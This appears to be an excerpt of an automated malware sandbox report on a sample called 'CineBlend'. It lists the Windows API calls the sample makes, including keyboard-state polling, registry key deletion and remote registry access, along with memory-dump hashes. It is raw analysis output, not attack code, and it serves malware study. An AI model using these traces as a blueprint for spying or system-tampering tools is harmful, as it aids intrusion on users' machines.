                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BD992B
                                          • GetMenuItemCount.USER32(?), ref: 00BD9948
                                          • GetMenuItemID.USER32(?,00000000), ref: 00BD9958
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BD998A
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BD99CC
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BD99FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                          • String ID: 0
                                          • API String ID: 1026556194-4108050209
                                          • Opcode ID: 2d19e1ad8e9dbd3842bc53b353c66c48b7caa64e469a41dbf802a821845bdeed
                                          • Instruction ID: 1b3b18d3653771481ca3a1fb4e3a7169560ad2c42b6b64432fd3bf9242ce285e
                                          • Opcode Fuzzy Hash: 2d19e1ad8e9dbd3842bc53b353c66c48b7caa64e469a41dbf802a821845bdeed
                                          • Instruction Fuzzy Hash: 8781AF71604301AFD710CF24D884AABFBE8FB89754F00099EF98597391EB71D905DBA2
                                          APIs
                                          • GetMenuItemInfoW.USER32(00C129C0,000000FF,00000000,00000030), ref: 00BAC973
                                          • SetMenuItemInfoW.USER32(00C129C0,00000004,00000000,00000030), ref: 00BAC9A8
                                          • Sleep.KERNEL32(000001F4), ref: 00BAC9BA
                                          • GetMenuItemCount.USER32(?), ref: 00BACA00
                                          • GetMenuItemID.USER32(?,00000000), ref: 00BACA1D
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00BACA49
                                          • GetMenuItemID.USER32(?,?), ref: 00BACA90
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BACAD6
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BACAEB
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BACB0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                          • String ID: 0
                                          • API String ID: 1460738036-4108050209
                                          • Opcode ID: 0af9af1b1bc71a3e36d4f67f151958bc946d96044cf1f4b42d6796257d3c1443
                                          • Instruction ID: ebac0e07bc067878094f9334b04ad4bc3ea4e71b988523316cd7a97ea6cd06e6
                                          • Opcode Fuzzy Hash: 0af9af1b1bc71a3e36d4f67f151958bc946d96044cf1f4b42d6796257d3c1443
                                          • Instruction Fuzzy Hash: 78619D70908249AFDF11CFA8DD89AFEBFE8FB06348F144096E951A3251DB31AD15CB60
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BAE4D4
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BAE4FA
                                          • _wcslen.LIBCMT ref: 00BAE504
                                          • _wcsstr.LIBVCRUNTIME ref: 00BAE554
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BAE570
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 1939486746-1459072770
                                          • Opcode ID: d61e25ac122a70d33938996b223ffd13c1d5523d979079d2a880a7d19e4f2237
                                          • Instruction ID: 81e2af9bab3f63d5591a2cd6335ac38eeb96cdf57d67ef8856b6b2c0870422ef
                                          • Opcode Fuzzy Hash: d61e25ac122a70d33938996b223ffd13c1d5523d979079d2a880a7d19e4f2237
                                          • Instruction Fuzzy Hash: C141F472A482047AEB04AB659C47EBF77ECDF56710F0401E6F901A61D2FB78EA01D2A5
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCD6C4
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BCD6ED
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BCD7A8
                                            • Part of subcall function 00BCD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BCD70A
                                            • Part of subcall function 00BCD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BCD71D
                                            • Part of subcall function 00BCD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BCD72F
                                            • Part of subcall function 00BCD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BCD765
                                            • Part of subcall function 00BCD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCD788
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BCD753
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2734957052-4033151799
                                          • Opcode ID: fb4882c3e888d8f917c7b63b3a456d327c42f8055b0c9a55e1c409f5246d69e2
                                          • Instruction ID: 619ebf7e232772b71035c5bc5d2f349bb8bf238746f96f88becc0292dcc1e537
                                          • Opcode Fuzzy Hash: fb4882c3e888d8f917c7b63b3a456d327c42f8055b0c9a55e1c409f5246d69e2
                                          • Instruction Fuzzy Hash: 01315E75A02129BBDB219B50DC98FFFBBBCEF45710F0041BAB855E3140EA349E459AA0
                                          APIs
                                          • timeGetTime.WINMM ref: 00BAEFCB
                                            • Part of subcall function 00B5F215: timeGetTime.WINMM(?,?,00BAEFEB), ref: 00B5F219
                                          • Sleep.KERNEL32(0000000A), ref: 00BAEFF8
                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00BAF01C
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BAF03E
                                          • SetActiveWindow.USER32 ref: 00BAF05D
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BAF06B
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BAF08A
                                          • Sleep.KERNEL32(000000FA), ref: 00BAF095
                                          • IsWindow.USER32 ref: 00BAF0A1
                                          • EndDialog.USER32(00000000), ref: 00BAF0B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: b5971ec5752aa275cffd2fdca95f8ff7e17b80f23d78a2af070a07d8ee397303
                                          • Instruction ID: 9817df98c6457cf89fcc5fabebd15285754cabe11c7a24de62baa196b18de713
                                          • Opcode Fuzzy Hash: b5971ec5752aa275cffd2fdca95f8ff7e17b80f23d78a2af070a07d8ee397303
                                          • Instruction Fuzzy Hash: 5421F375108246BFE7212F60EC99BBABBEAF74B748F0040B6F54183272DF718C008661
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BAF374
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BAF38A
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAF39B
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BAF3AD
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BAF3BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: SendString$_wcslen
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2420728520-1007645807
                                          • Opcode ID: a163978453c56956ab0dc1e2d94142cdfc2a0905005cbd7b1708556dcbe4e481
                                          • Instruction ID: 54a6804d22404461a43dcd82d836e3d49c627438142e4eeb8f7a139fbd97b693
                                          • Opcode Fuzzy Hash: a163978453c56956ab0dc1e2d94142cdfc2a0905005cbd7b1708556dcbe4e481
                                          • Instruction Fuzzy Hash: 0211A371E9416979DB24A7A58C4AEFF6BFCEBD2B40F0005B97401E20D1DAA06E05C5B1
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00BAA9D9
                                          • SetKeyboardState.USER32(?), ref: 00BAAA44
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00BAAA64
                                          • GetKeyState.USER32(000000A0), ref: 00BAAA7B
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00BAAAAA
                                          • GetKeyState.USER32(000000A1), ref: 00BAAABB
                                          • GetAsyncKeyState.USER32(00000011), ref: 00BAAAE7
                                          • GetKeyState.USER32(00000011), ref: 00BAAAF5
                                          • GetAsyncKeyState.USER32(00000012), ref: 00BAAB1E
                                          • GetKeyState.USER32(00000012), ref: 00BAAB2C
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00BAAB55
                                          • GetKeyState.USER32(0000005B), ref: 00BAAB63
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 75444f34488d964412cd0be1e00536fd1ca28610facada262a9636e57b6405f5
                                          • Instruction ID: c75489e914bc349fc5586cbe0a90a649968d9395d67a179f00562ee7098d2997
                                          • Opcode Fuzzy Hash: 75444f34488d964412cd0be1e00536fd1ca28610facada262a9636e57b6405f5
                                          • Instruction Fuzzy Hash: 4751B360A0C78429EB35DBA08950BAAAFF5DF13340F4845DE85C25B1C2DB649B4CC772
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 00BA6649
                                          • GetWindowRect.USER32(00000000,?), ref: 00BA6662
                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00BA66C0
                                          • GetDlgItem.USER32(?,00000002), ref: 00BA66D0
                                          • GetWindowRect.USER32(00000000,?), ref: 00BA66E2
                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00BA6736
                                          • GetDlgItem.USER32(?,000003E9), ref: 00BA6744
                                          • GetWindowRect.USER32(00000000,?), ref: 00BA6756
                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00BA6798
                                          • GetDlgItem.USER32(?,000003EA), ref: 00BA67AB
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BA67C1
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00BA67CE
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: e41e59501a551d5c89fec754b6c4396be400262e3e9aedb60397c4b18a5a2105
                                          • Instruction ID: 84cf8c770673f6f7574054cd3917da7ae09f8331589b5e135f18f97cf620cb93
                                          • Opcode Fuzzy Hash: e41e59501a551d5c89fec754b6c4396be400262e3e9aedb60397c4b18a5a2105
                                          • Instruction Fuzzy Hash: 485122B1B01205AFDF18CF68DD95AAEBBB9FB48314F148169F919E7290EB709D04CB50
                                          APIs
                                            • Part of subcall function 00B41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B41488,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B41865
                                          • DestroyWindow.USER32(?), ref: 00B41521
                                          • KillTimer.USER32(00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B415BB
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B829B4
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B829E2
                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B829F9
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000), ref: 00B82A15
                                          • DeleteObject.GDI32(00000000), ref: 00B82A27
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: db35aaf465d5c8ff9f259a5c1aee014200976966d88659f72e48c6c7e63df54a
                                          • Instruction ID: 78410fe18e79c8d4501d98c494beefb69452b8eddfab7ce7cd9a80a4a2825e72
                                          • Opcode Fuzzy Hash: db35aaf465d5c8ff9f259a5c1aee014200976966d88659f72e48c6c7e63df54a
                                          • Instruction Fuzzy Hash: 15616935901711DFDB39AF18D958B69B7F1FF91312F108999E08297670C770AA90EF44
                                          APIs
                                            • Part of subcall function 00B42234: GetWindowLongW.USER32(?,000000EB), ref: 00B42242
                                          • GetSysColor.USER32(0000000F), ref: 00B42152
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 1e92c313693d8c1109f9cce97af8dab3d707f01e230a5e15c5cbf6fd948e985e
                                          • Instruction ID: 8f29280e371ff0e12245805581647ae08ea50a4b60d161622cb2d9a5e487f40b
                                          • Opcode Fuzzy Hash: 1e92c313693d8c1109f9cce97af8dab3d707f01e230a5e15c5cbf6fd948e985e
                                          • Instruction Fuzzy Hash: 3941D535101640AFDB205F38DC94BB97BE5EB42B30F554286FAA2A72E1D7318E42FB10
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00B90D31,00000001,0000138C,00000001,00000001,00000001,?,00BBEEAE,00C12430), ref: 00BAA091
                                          • LoadStringW.USER32(00000000,?,00B90D31,00000001), ref: 00BAA09A
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B90D31,00000001,0000138C,00000001,00000001,00000001,?,00BBEEAE,00C12430,?), ref: 00BAA0BC
                                          • LoadStringW.USER32(00000000,?,00B90D31,00000001), ref: 00BAA0BF
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAA1E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 747408836-2268648507
                                          • Opcode ID: 505a7be7db4e134f5d3c5325e2d8077729a08fe41bccc82f8a8807c945767dc5
                                          • Instruction ID: f866ca36644ea2f9966396eb6f75390be6b02a9df981167f73425e3cd958a176
                                          • Opcode Fuzzy Hash: 505a7be7db4e134f5d3c5325e2d8077729a08fe41bccc82f8a8807c945767dc5
                                          • Instruction Fuzzy Hash: 90413272804109AACF05FBE0DD96EEEB7B8EF15700F5001A5F605B2092EB75AF49DB61
                                          APIs
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA1093
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA10AF
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA10CB
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA10F5
                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00BA111D
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA1128
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA112D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 323675364-22481851
                                          • Opcode ID: 3222a0af07f2a53626a95095d3aaf21caf1a2edb27c9f177de9fac085e70e966
                                          • Instruction ID: 16e769775ecc194855cb1c09551357d799259fc5a633d1b8389cfd825f0f69a1
                                          • Opcode Fuzzy Hash: 3222a0af07f2a53626a95095d3aaf21caf1a2edb27c9f177de9fac085e70e966
                                          • Instruction Fuzzy Hash: 0F41F872C10229ABCF25EFA4DC95DEEB7B8FF14750F0045A9E945A31A1EB319E04DB50
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD4AD9
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00BD4AE0
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD4AF3
                                          • SelectObject.GDI32(00000000,00000000), ref: 00BD4AFB
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD4B06
                                          • DeleteDC.GDI32(00000000), ref: 00BD4B10
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00BD4B1A
                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BD4B30
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BD4B3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 6e07656b5d13a0aab36fa5e661007cb9787e8ec64d094679b3d27033e41f3c2c
                                          • Instruction ID: 0ebd6ced8d67d98ec23b148ea8142538f1337d23c96c85a81aa423e452f5b4e2
                                          • Opcode Fuzzy Hash: 6e07656b5d13a0aab36fa5e661007cb9787e8ec64d094679b3d27033e41f3c2c
                                          • Instruction Fuzzy Hash: EA319231141215BBDF119F64DC08FDABBA9FF0D324F110252FA54A61A0EB35D810DB94
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00BC46B9
                                          • CoInitialize.OLE32(00000000), ref: 00BC46E7
                                          • CoUninitialize.OLE32 ref: 00BC46F1
                                          • _wcslen.LIBCMT ref: 00BC478A
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00BC480E
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC4932
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00BC496B
                                          • CoGetObject.OLE32(?,00000000,00BE0B64,?), ref: 00BC498A
                                          • SetErrorMode.KERNEL32(00000000), ref: 00BC499D
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC4A21
                                          • VariantClear.OLEAUT32(?), ref: 00BC4A35
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
